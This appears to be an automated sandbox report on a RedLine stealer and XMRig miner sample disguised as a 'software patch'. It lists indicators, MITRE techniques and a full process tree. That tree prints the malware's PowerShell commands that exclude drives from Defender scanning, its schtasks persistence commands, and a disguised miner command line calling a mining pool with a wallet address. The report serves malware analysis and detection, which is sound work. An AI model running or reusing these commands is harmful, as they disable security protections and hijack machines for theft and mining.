redline | ea152bfedb88c978ab9730ab0f6c9f4baed1777e33d5a6e25c3d542b5c39bb61

Analysis

max time kernel
150s
max time network
135s
platform
windows10_x64
resource
win10-en-20210920
submitted
21-10-2021 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software patch by Sylox.exe
Size

3.2MB
MD5

32da7dfc115619bf8a6197ec22b75edf
SHA1

6118bde049e88592ff92464788c63992a96ece13
SHA256

ea152bfedb88c978ab9730ab0f6c9f4baed1777e33d5a6e25c3d542b5c39bb61
SHA512

c2a522312fe8bcbe092c6dd46e6e34c53e0d9bf58bccea1f9de1e96b06c0f08d452e0c000a46f34b1cc5bbe22df866243edd17450c1a2ddf43854ddba26864a1

Score

10^/10

redline xmrig @faqu_1 discovery evasion infostealer miner spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

@faqu_1

95.181.152.6:46927

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/664-136-0x00000000001A0000-0x00000000001CE000-memory.dmp	family_redline
behavioral2/memory/664-142-0x0000000000900000-0x0000000000919000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2180-498-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/2180-522-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

Datafile32.exeDatafile64.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exe

pid process

912 Datafile32.exe
2384 Datafile64.exe
664 Server32.exe
1060 services32.exe
2064 services64.exe
1944 sihost32.exe
3548 sihost64.exe

pid	process
912	Datafile32.exe
2384	Datafile64.exe
664	Server32.exe
1060	services32.exe
2064	services64.exe
1944	sihost32.exe
3548	sihost64.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Datafile32.exeDatafile64.exeservices32.exeservices64.exeSoftware patch by Sylox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Datafile32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	services32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Software patch by Sylox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Datafile32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	services32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Software patch by Sylox.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3720-117-0x00000000003C0000-0x00000000003C1000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe	themida
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe	themida
behavioral2/memory/912-125-0x0000000000400000-0x0000000000E48000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe	themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe	themida
behavioral2/memory/2384-131-0x0000000000400000-0x0000000000EAE000-memory.dmp	themida
C:\Windows\System32\services32.exe	themida
C:\Windows\system32\services32.exe	themida
C:\Windows\System32\services64.exe	themida
C:\Windows\system32\services64.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

services32.exeservices64.exeSoftware patch by Sylox.exeDatafile32.exeDatafile64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	services32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	services64.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Software patch by Sylox.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Datafile32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Datafile64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 7 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\services32.exe	conhost.exe
File opened for modification	C:\Windows\system32\services32.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

Software patch by Sylox.exeDatafile32.exeDatafile64.exeservices32.exeservices64.exe

pid process

3720 Software patch by Sylox.exe
912 Datafile32.exe
2384 Datafile64.exe
1060 services32.exe
2064 services64.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1432 set thread context of 2180 1432 conhost.exe nslookup.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3104 schtasks.exe
2840 schtasks.exe

pid	process
3720	Software patch by Sylox.exe
912	Datafile32.exe
2384	Datafile64.exe
1060	services32.exe
2064	services64.exe

description	pid	process	target process
PID 1432 set thread context of 2180	1432	conhost.exe	nslookup.exe

pid	process
3104	schtasks.exe
2840	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exe

pid	process
3928	conhost.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
2240	conhost.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
1208	powershell.exe
1208	powershell.exe
2332	powershell.exe
2332	powershell.exe
1208	powershell.exe
2332	powershell.exe
664	Server32.exe
2912	conhost.exe
2912	conhost.exe
2116	powershell.exe
2116	powershell.exe
2116	powershell.exe
2124	powershell.exe
1432	conhost.exe
1432	conhost.exe
2124	powershell.exe
2124	powershell.exe
2396	powershell.exe
2396	powershell.exe
2396	powershell.exe
1504	powershell.exe
1504	powershell.exe
2180	nslookup.exe
2180	nslookup.exe
1504	powershell.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe
2180	nslookup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Software patch by Sylox.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3720	Software patch by Sylox.exe
Token: SeDebugPrivilege	3928	conhost.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2240	conhost.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeIncreaseQuotaPrivilege	2460	powershell.exe
Token: SeSecurityPrivilege	2460	powershell.exe
Token: SeTakeOwnershipPrivilege	2460	powershell.exe
Token: SeLoadDriverPrivilege	2460	powershell.exe
Token: SeSystemProfilePrivilege	2460	powershell.exe
Token: SeSystemtimePrivilege	2460	powershell.exe
Token: SeProfSingleProcessPrivilege	2460	powershell.exe
Token: SeIncBasePriorityPrivilege	2460	powershell.exe
Token: SeCreatePagefilePrivilege	2460	powershell.exe
Token: SeBackupPrivilege	2460	powershell.exe
Token: SeRestorePrivilege	2460	powershell.exe
Token: SeShutdownPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeSystemEnvironmentPrivilege	2460	powershell.exe
Token: SeRemoteShutdownPrivilege	2460	powershell.exe
Token: SeUndockPrivilege	2460	powershell.exe
Token: SeManageVolumePrivilege	2460	powershell.exe
Token: 33	2460	powershell.exe
Token: 34	2460	powershell.exe
Token: 35	2460	powershell.exe
Token: 36	2460	powershell.exe
Token: SeIncreaseQuotaPrivilege	3052	powershell.exe
Token: SeSecurityPrivilege	3052	powershell.exe
Token: SeTakeOwnershipPrivilege	3052	powershell.exe
Token: SeLoadDriverPrivilege	3052	powershell.exe
Token: SeSystemProfilePrivilege	3052	powershell.exe
Token: SeSystemtimePrivilege	3052	powershell.exe
Token: SeProfSingleProcessPrivilege	3052	powershell.exe
Token: SeIncBasePriorityPrivilege	3052	powershell.exe
Token: SeCreatePagefilePrivilege	3052	powershell.exe
Token: SeBackupPrivilege	3052	powershell.exe
Token: SeRestorePrivilege	3052	powershell.exe
Token: SeShutdownPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeSystemEnvironmentPrivilege	3052	powershell.exe
Token: SeRemoteShutdownPrivilege	3052	powershell.exe
Token: SeUndockPrivilege	3052	powershell.exe
Token: SeManageVolumePrivilege	3052	powershell.exe
Token: 33	3052	powershell.exe
Token: 34	3052	powershell.exe
Token: 35	3052	powershell.exe
Token: 36	3052	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeIncreaseQuotaPrivilege	1208	powershell.exe
Token: SeSecurityPrivilege	1208	powershell.exe
Token: SeTakeOwnershipPrivilege	1208	powershell.exe
Token: SeLoadDriverPrivilege	1208	powershell.exe
Token: SeSystemProfilePrivilege	1208	powershell.exe
Token: SeSystemtimePrivilege	1208	powershell.exe
Token: SeProfSingleProcessPrivilege	1208	powershell.exe
Token: SeIncBasePriorityPrivilege	1208	powershell.exe
Token: SeCreatePagefilePrivilege	1208	powershell.exe
Token: SeBackupPrivilege	1208	powershell.exe
Token: SeRestorePrivilege	1208	powershell.exe
Token: SeShutdownPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeSystemEnvironmentPrivilege	1208	powershell.exe
Token: SeRemoteShutdownPrivilege	1208	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software patch by Sylox.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exeservices64.execonhost.execmd.exe

description	pid	process	target process
PID 3720 wrote to memory of 912	3720	Software patch by Sylox.exe	Datafile32.exe
PID 3720 wrote to memory of 912	3720	Software patch by Sylox.exe	Datafile32.exe
PID 3720 wrote to memory of 2384	3720	Software patch by Sylox.exe	Datafile64.exe
PID 3720 wrote to memory of 2384	3720	Software patch by Sylox.exe	Datafile64.exe
PID 3720 wrote to memory of 664	3720	Software patch by Sylox.exe	Server32.exe
PID 3720 wrote to memory of 664	3720	Software patch by Sylox.exe	Server32.exe
PID 3720 wrote to memory of 664	3720	Software patch by Sylox.exe	Server32.exe
PID 912 wrote to memory of 3928	912	Datafile32.exe	conhost.exe
PID 912 wrote to memory of 3928	912	Datafile32.exe	conhost.exe
PID 912 wrote to memory of 3928	912	Datafile32.exe	conhost.exe
PID 3928 wrote to memory of 1188	3928	conhost.exe	cmd.exe
PID 3928 wrote to memory of 1188	3928	conhost.exe	cmd.exe
PID 1188 wrote to memory of 2460	1188	cmd.exe	powershell.exe
PID 1188 wrote to memory of 2460	1188	cmd.exe	powershell.exe
PID 3928 wrote to memory of 2228	3928	conhost.exe	cmd.exe
PID 3928 wrote to memory of 2228	3928	conhost.exe	cmd.exe
PID 2228 wrote to memory of 3104	2228	cmd.exe	schtasks.exe
PID 2228 wrote to memory of 3104	2228	cmd.exe	schtasks.exe
PID 2384 wrote to memory of 2240	2384	Datafile64.exe	conhost.exe
PID 2384 wrote to memory of 2240	2384	Datafile64.exe	conhost.exe
PID 2384 wrote to memory of 2240	2384	Datafile64.exe	conhost.exe
PID 2240 wrote to memory of 3564	2240	conhost.exe	cmd.exe
PID 2240 wrote to memory of 3564	2240	conhost.exe	cmd.exe
PID 3564 wrote to memory of 3052	3564	cmd.exe	powershell.exe
PID 3564 wrote to memory of 3052	3564	cmd.exe	powershell.exe
PID 2240 wrote to memory of 1972	2240	conhost.exe	cmd.exe
PID 2240 wrote to memory of 1972	2240	conhost.exe	cmd.exe
PID 1972 wrote to memory of 2840	1972	cmd.exe	schtasks.exe
PID 1972 wrote to memory of 2840	1972	cmd.exe	schtasks.exe
PID 1188 wrote to memory of 1208	1188	cmd.exe	powershell.exe
PID 1188 wrote to memory of 1208	1188	cmd.exe	powershell.exe
PID 3564 wrote to memory of 2332	3564	cmd.exe	powershell.exe
PID 3564 wrote to memory of 2332	3564	cmd.exe	powershell.exe
PID 3928 wrote to memory of 4092	3928	conhost.exe	cmd.exe
PID 3928 wrote to memory of 4092	3928	conhost.exe	cmd.exe
PID 4092 wrote to memory of 1060	4092	cmd.exe	services32.exe
PID 4092 wrote to memory of 1060	4092	cmd.exe	services32.exe
PID 2240 wrote to memory of 1504	2240	conhost.exe	cmd.exe
PID 2240 wrote to memory of 1504	2240	conhost.exe	cmd.exe
PID 1504 wrote to memory of 2064	1504	cmd.exe	services64.exe
PID 1504 wrote to memory of 2064	1504	cmd.exe	services64.exe
PID 1060 wrote to memory of 2912	1060	services32.exe	conhost.exe
PID 1060 wrote to memory of 2912	1060	services32.exe	conhost.exe
PID 1060 wrote to memory of 2912	1060	services32.exe	conhost.exe
PID 2912 wrote to memory of 3528	2912	conhost.exe	cmd.exe
PID 2912 wrote to memory of 3528	2912	conhost.exe	cmd.exe
PID 3528 wrote to memory of 2116	3528	cmd.exe	powershell.exe
PID 3528 wrote to memory of 2116	3528	cmd.exe	powershell.exe
PID 2912 wrote to memory of 1944	2912	conhost.exe	sihost32.exe
PID 2912 wrote to memory of 1944	2912	conhost.exe	sihost32.exe
PID 2064 wrote to memory of 1432	2064	services64.exe	conhost.exe
PID 2064 wrote to memory of 1432	2064	services64.exe	conhost.exe
PID 2064 wrote to memory of 1432	2064	services64.exe	conhost.exe
PID 3528 wrote to memory of 2124	3528	cmd.exe	powershell.exe
PID 3528 wrote to memory of 2124	3528	cmd.exe	powershell.exe
PID 1432 wrote to memory of 3576	1432	conhost.exe	cmd.exe
PID 1432 wrote to memory of 3576	1432	conhost.exe	cmd.exe
PID 3576 wrote to memory of 2396	3576	cmd.exe	powershell.exe
PID 3576 wrote to memory of 2396	3576	cmd.exe	powershell.exe
PID 1432 wrote to memory of 3548	1432	conhost.exe	sihost64.exe
PID 1432 wrote to memory of 3548	1432	conhost.exe	sihost64.exe
PID 1432 wrote to memory of 2180	1432	conhost.exe	nslookup.exe
PID 1432 wrote to memory of 2180	1432	conhost.exe	nslookup.exe
PID 1432 wrote to memory of 2180	1432	conhost.exe	nslookup.exe

C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe
"C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3720

C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
5⤵
- Creates scheduled task(s)
PID:3104

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\system32\services32.exe
C:\Windows\system32\services32.exe
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:3528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
7⤵
- Executes dropped EXE
PID:1944

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost32"
8⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
- Creates scheduled task(s)
PID:2840

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1504

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:3548

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:3960

C:\Windows\System32\nslookup.exe
C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180

C:\Users\Admin\AppData\Local\Temp\Server32.exe
"C:\Users\Admin\AppData\Local\Temp\Server32.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:664

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
